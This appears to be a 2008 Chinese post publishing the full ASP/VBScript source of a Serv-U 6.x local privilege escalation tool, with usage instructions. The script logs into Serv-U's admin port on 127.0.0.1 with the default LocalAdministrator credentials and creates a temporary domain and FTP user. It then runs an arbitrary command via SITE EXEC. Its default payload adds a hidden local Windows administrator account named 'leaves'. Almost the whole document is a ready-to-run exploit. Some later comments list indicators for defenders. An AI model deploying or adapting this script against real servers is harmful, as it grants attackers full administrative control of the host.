
Serv-U 6.X 提权脚本

2008-02-12

作者:落叶纷飞 来源:http://www.cnsst.org/ 使用方法:目标为 Serv-U 6.4 以下版本时保持表单默认值即可,只需按需修改要执行的命令;目标为 6.4 时请在“服务器端口”中填 21,并在“服务器IP”中填写服务器的真实 IP。说明:此脚本需放在目标机自身的 ASP 站点上运行(它只连接 127.0.0.1),分三步:先用表单中的管理员账号登录本机 Serv-U 管理端口建立临时域与用户,再以该用户通过 SITE EXEC 执行命令,最后删除临时域;默认命令会新建一个名为 leaves 的本地管理员账户。

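<%@ LANGUAGE = VBScript %>
<%
' Serv-U 6.x local privilege escalation. The page must run on the target's own
' web server: every connection below goes to 127.0.0.1.
'
' The hidden "action" field drives three round-trips (see the select case further down):
'   1    log into the Serv-U admin port with the administrator login from the form,
'        drop any old throw-away domain "leaves" and create it again with user luo/ye
'        whose home directory is the system drive
'   2    log in as that user and run the requested command through SITE EXEC
'   3    log back into the admin port and delete the throw-away domain
'   else render the input form and abort any request still pending in the session
'
' This prologue only validates the input and builds the raw Serv-U command
' strings; it sends nothing.
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
Dim action, f, ffport, iip

' "action" selects the step. A missing field (first visit) must reach the
' "case else" form; anything else that is not a number is rejected outright.
action = Request("action")
If action = "" Then action = 0            ' Empty and "" both compare equal to "" here
If Not IsNumeric(action) Then Response.End
action = CLng(action)                     ' make "1" and 1 hit the same Case label

' Inputs posted by the form (and carried forward by the intermediate pages as hidden fields).
user = Trim(Request("u"))        ' Serv-U administrator login used on the admin port
pass = Trim(Request("p"))
port = Trim(Request("port"))     ' Serv-U admin port on 127.0.0.1 (form default 43958)
cmd  = Trim(Request("c"))        ' command handed to SITE EXEC in step 2

' Drive letter of the system drive (e.g. "c:"), used as the temporary user's
' home directory and access path. Taken from the form when given, else detected.
f = Trim(Request("f"))
If f = "" Then
    f = gpath()
Else
    f = Left(f, 2)
End If

' IP and FTP port of the throw-away domain. The form carries "ffport" and "iip"
' fields (the 6.4 instructions tell the user to fill them in) but the script as
' originally posted never read them, so they were always Empty; the fall-backs
' are the form's own default values.
ffport = Trim(Request("ffport"))
If ffport = "" Then ffport = "65500"
iip = Trim(Request("iip"))
If iip = "" Then iip = "0.0.0.0"
ftpport = ffport

' Raw command lines for the Serv-U admin channel, one per vbCrLf. They are
' written verbatim into the HTTP request body in the select case below.
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
mt        = "SITE MAINTENANCE" & vbCrLf
quit      = "QUIT" & vbCrLf

' Delete the throw-away domain (used in step 3, and sent at the start of step 1
' too - presumably to clear a domain left over from an aborted run).
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=" & iip & vbCrLf & " PortNo=" & ftpport & vbCrLf

' Create domain "leaves" listening on iip:ftpport.
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=leaves|" & iip & "|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf

' Create user luo/ye inside it with its home directory and access path on the
' system drive. "Maintenance=System" and the access string "RWAMELCDP" are what
' the script relies on for SITE EXEC to be accepted in step 2 (not verified here).
' The fixed names (domain "leaves", user luo/ye) are static indicators of this tool.
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=luo" & vbCrLf & "-Password=ye" & vbCrLf & _
        "-HomeDir=c:\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\|RWAMELCDP" & vbCrLf

' Point both the home directory and the access path at the selected drive.
newuser = Replace(newuser, "c:", f)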
34
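' Step dispatcher. Each step fires its Serv-U conversation as the body of a
' plain HTTP GET to 127.0.0.1 (the script relies on the Serv-U listener reading
' the raw request body line by line as commands; the HTTP request line and
' headers in front of it are apparently ignored). The send is asynchronous and
' the XMLHTTP object is parked in the session - presumably so the connection
' is not torn down when this page ends - while the browser is auto-submitted to
' the next step after 4 seconds. The "case else" branch aborts whatever is still
' pending and renders the form.
'
' Reflected values are HTML-encoded so a command containing quotes or "<"
' survives the hidden-field round-trip instead of breaking the markup.
' Defender note: the URL paths /leaves/upadmin/s1..s3, the domain "leaves", the
' FTP user luo/ye and the default payload's Windows account "leaves" are static
' indicators of this tool.
Select Case action
Case 1
    ' Admin login: delete any old "leaves" domain, create it again with user luo/ye.
    Set a = Server.CreateObject("Microsoft.XMLHTTP")
    a.open "GET", "http://127.0.0.1:" & port & "/leaves/upadmin/s1", True, "", ""
    a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
    Set session("a") = a
%>
<form method="post" name="leaves">
<input name="u" type="hidden" id="u" value="<%=Server.HTMLEncode(user)%>">
<input name="p" type="hidden" id="p" value="<%=Server.HTMLEncode(pass)%>">
<input name="port" type="hidden" id="port" value="<%=Server.HTMLEncode(port)%>">
<input name="c" type="hidden" id="c" value="<%=Server.HTMLEncode(cmd)%>">
<input name="f" type="hidden" id="f" value="<%=Server.HTMLEncode(f)%>">
<input name="ffport" type="hidden" id="ffport" value="<%=Server.HTMLEncode(ffport)%>">
<input name="iip" type="hidden" id="iip" value="<%=Server.HTMLEncode(iip)%>">
<input name="action" type="hidden" id="action" value="2">
</form>
<center>正在连接 127.0.0.1:<%=Server.HTMLEncode(port)%>,使用用户名: <%=Server.HTMLEncode(user)%>,口令:<%=Server.HTMLEncode(pass)%>...</center>
<script language="javascript">
// Give the asynchronous admin session time to complete before moving on.
setTimeout(function () { document.forms["leaves"].submit(); }, 4000);
</script>
<%
Case 2
    ' Log in as the temporary user on the throw-away domain and run the command.
    Set b = Server.CreateObject("Microsoft.XMLHTTP")
    b.open "GET", "http://127.0.0.1:" & ftpport & "/leaves/upadmin/s2", True, "", ""
    b.send "User luo" & vbCrLf & "pass ye" & vbCrLf & "site exec " & cmd & vbCrLf & quit
    Set session("b") = b
%>
<form method="post" name="leaves">
<input name="u" type="hidden" id="u" value="<%=Server.HTMLEncode(user)%>">
<input name="p" type="hidden" id="p" value="<%=Server.HTMLEncode(pass)%>">
<input name="port" type="hidden" id="port" value="<%=Server.HTMLEncode(port)%>">
<input name="c" type="hidden" id="c" value="<%=Server.HTMLEncode(cmd)%>">
<input name="f" type="hidden" id="f" value="<%=Server.HTMLEncode(f)%>">
<input name="ffport" type="hidden" id="ffport" value="<%=Server.HTMLEncode(ffport)%>">
<input name="iip" type="hidden" id="iip" value="<%=Server.HTMLEncode(iip)%>">
<input name="action" type="hidden" id="action" value="3">
</form>
<center>正在提升权限,请等待...</center>
<script language="javascript">
setTimeout(function () { document.forms["leaves"].submit(); }, 4000);
</script>
<%
Case 3
    ' Clean up: admin login again and delete the throw-away domain. The Windows
    ' account created by the default command is the payload and is left in place.
    Set c = Server.CreateObject("Microsoft.XMLHTTP")
    c.open "GET", "http://127.0.0.1:" & port & "/leaves/upadmin/s3", True, "", ""
    c.send loginuser & loginpass & mt & deldomain & quit
    Set session("c") = c
%>
<center>提权完毕,已执行了命令:
<font color=red><%=Server.HTMLEncode(cmd)%></font>
<input type=button value=" 返回继续 " onClick="location.href='<%=gname()%>';">
</center>
<%
Case Else
    ' Abort and drop any request a previous run left in the session. Objects
    ' that were never created are simply Nothing, hence the error suppression.
    On Error Resume Next
    Set a = session("a")
    Set b = session("b")
    Set c = session("c")
    a.abort
    Set a = Nothing
    b.abort
    Set b = Nothing
    c.abort
    Set c = Nothing
%>
<!-- Input form. The defaults assume the stock Serv-U LocalAdministrator login and
     admin port 43958 are still in place; "服务器端口"/"服务器IP" describe the
     throw-away domain (see the usage note at the top of the page). -->
<center>
<form method="post" name="leaves">
<table>
  <tr align="center" valign="middle">
    <td colspan="2">Serv-U 6.X 提权脚本 by 落叶纷飞【S.S.T】 @ 肇庆</td>
  </tr>
  <tr align="center" valign="middle">
    <td width="200">用户名:</td>
    <td width="400"><input name="u" type="text" id="u" value="LocalAdministrator"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>口 令:</td>
    <td><input name="p" type="text" id="p" value="#l@$ak#.lk;0@P"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>端 口:</td>
    <td><input name="port" type="text" id="port" value="43958"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>服务器端口:</td>
    <td><input name="ffport" type="text" id="ffport" value="65500"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>服务器IP:</td>
    <td><input name="iip" type="text" id="iip" value="0.0.0.0"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>系统路径:</td>
    <td><input name="f" type="text" id="f" value="<%=Server.HTMLEncode(f)%>" size="8"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>命 令:</td>
    <!-- Default payload: create local user "leaves"/"cnsst" and add it to Administrators. -->
    <td><input name="c" type="text" id="c" value="cmd /c net user leaves cnsst /add &amp; net localgroup administrators leaves /add" size="50"></td>
  </tr>
  <tr align="center" valign="middle">
    <td colspan="2"><input type="submit" name="Submit" value="提交">
      <input type="reset" name="Submit2" value="重置">
      <input name="action" type="hidden" id="action" value="1"></td>
  </tr>
</table>
</form>
</center>
<% End Select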
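' Drive letter of the Windows installation, lower-cased (e.g. "c:"); used as
' the default home directory of the temporary Serv-U user. Falls back to "c:"
' when Scripting.FileSystemObject cannot be created (component missing or blocked).
' The original used the undeclared script-level variable "f" as scratch space,
' which is the very variable the caller assigns the result to; a Dim'd local
' keeps the function self-contained.
Function Gpath()
    Dim fso
    On Error Resume Next
    Err.Clear
    Set fso = Server.CreateObject("Scripting.FileSystemObject")
    If Err.Number > 0 Then
        Gpath = "c:"
        Exit Function
    End If
    ' GetSpecialFolder(0) is the Windows folder (its path, e.g. "C:\WINDOWS");
    ' only the drive letter and colon are kept.
    Gpath = fso.GetSpecialFolder(0)
    Gpath = LCase(Left(Gpath, 2))
    Set fso = Nothing
End Function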
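' Absolute URL of this script, used by the "return" button on the result page.
' Built from SERVER_NAME (not the Host header) and the lower-cased SCRIPT_NAME.
' The scheme follows the HTTPS server variable instead of being hard-coded to
' http, and the port is only appended when it is not the scheme's default.
Function GName()
    Dim scheme, defPort, prt
    If LCase(request.servervariables("HTTPS")) = "on" Then
        scheme = "https://"
        defPort = "443"
    Else
        scheme = "http://"
        defPort = "80"
    End If
    prt = request.servervariables("SERVER_PORT")
    GName = scheme & request.servervariables("server_name")
    If prt <> defPort Then GName = GName & ":" & prt
    GName = GName & LCase(request.servervariables("script_name"))
End Function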
%>